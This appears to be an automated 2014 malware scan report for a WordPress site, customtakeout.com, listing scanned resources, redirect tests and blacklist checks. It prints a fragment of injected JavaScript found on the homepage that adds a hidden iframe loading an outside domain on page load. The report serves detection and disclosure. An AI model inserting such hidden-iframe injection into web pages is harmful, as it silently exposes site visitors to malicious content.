Scanned pages/files
| Request | Server response | Status |
http://customtakeout.com/ | 200 OK Content-Length: 57617 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/?2'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
| ||
http://customtakeout.com//www.googleadservices.com/pagead/conversion.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 06 Dec 2014 15:23:26 GMT Pragma: no-cache Location: http://customtakeout.com/www.googleadservices.com/pagead/conversion.js/ Server: Apache Vary: Cookie Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 06 Dec 2014 15:23:27 GMT Set-Cookie: PHPSESSID=i6u40k7ha769kni5fo9de6bqc1; path=/ Set-Cookie: wpsc_customer_cookie_855a80fe17156de5015672d6a08b3f08=_xVVP4JgtVLAQ%7C1418052207%7Cae4b72bc905d6944d40f6811a8aea3f8; expires=Mon, 08-Dec-2014 15:23:27 GMT; path=/; httponly X-Pingback: http://customtakeout.com/xmlrpc.php | clean |
http://customtakeout.com/www.googleadservices.com/pagead/conversion.js/ | 404 Not Found Content-Length: 837 Content-Type: text/html | clean |
http://customtakeout.com/test404page.js | 404 Not Found Content-Length: 843 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js | 200 OK Content-Length: 85925 Content-Type: text/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/jquery.cycle.all.js | 200 OK Content-Length: 51734 Content-Type: application/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/jquery-ui.min.js | 200 OK Content-Length: 206617 Content-Type: application/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/ddsmoothmenu.js | 200 OK Content-Length: 8151 Content-Type: application/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/fancybox/jquery.mousewheel-3.0.4.pack.js | 200 OK Content-Length: 1279 Content-Type: application/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/fancybox/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 15624 Content-Type: application/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/jquery.capSlide.js | 200 OK Content-Length: 1503 Content-Type: application/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/jquery-tooltip/lib/jquery.bgiframe.js | 200 OK Content-Length: 5044 Content-Type: application/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/jquery-tooltip/lib/jquery.dimensions.js | 200 OK Content-Length: 17765 Content-Type: application/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/jquery-tooltip/jquery.tooltip.js | 200 OK Content-Length: 8087 Content-Type: application/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/jquery-css-transform.js | 200 OK Content-Length: 3389 Content-Type: application/javascript | clean |
http://customtakeout.com/wp-content/themes/mazine2/js/jquery.quicksand.js | 200 OK Content-Length: 14785 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: customtakeout.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3, must-revalidate
Connection: close
Date: Sat, 06 Dec 2014 15:23:24 GMT
Server: Apache
Vary: Accept-Encoding,Cookie
Content-Type: text/html; charset=UTF-8
WP-Super-Cache: Served supercache file from PHP
GET / HTTP/1.1
Host: customtakeout.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3, must-revalidate
Connection: close
Date: Sat, 06 Dec 2014 15:23:24 GMT
Server: Apache
Vary: Accept-Encoding,Cookie
Content-Type: text/html; charset=UTF-8
WP-Super-Cache: Served supercache file from PHP
Second query (visit from search engine):
GET / HTTP/1.1
Host: customtakeout.com
Referer: http://www.google.com/search?q=customtakeout.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: customtakeout.com
Referer: http://www.google.com/search?q=customtakeout.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=customtakeout.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://customtakeout.com/
Result: customtakeout.com is not infected or malware details are not published yet.
Result: customtakeout.com is not infected or malware details are not published yet.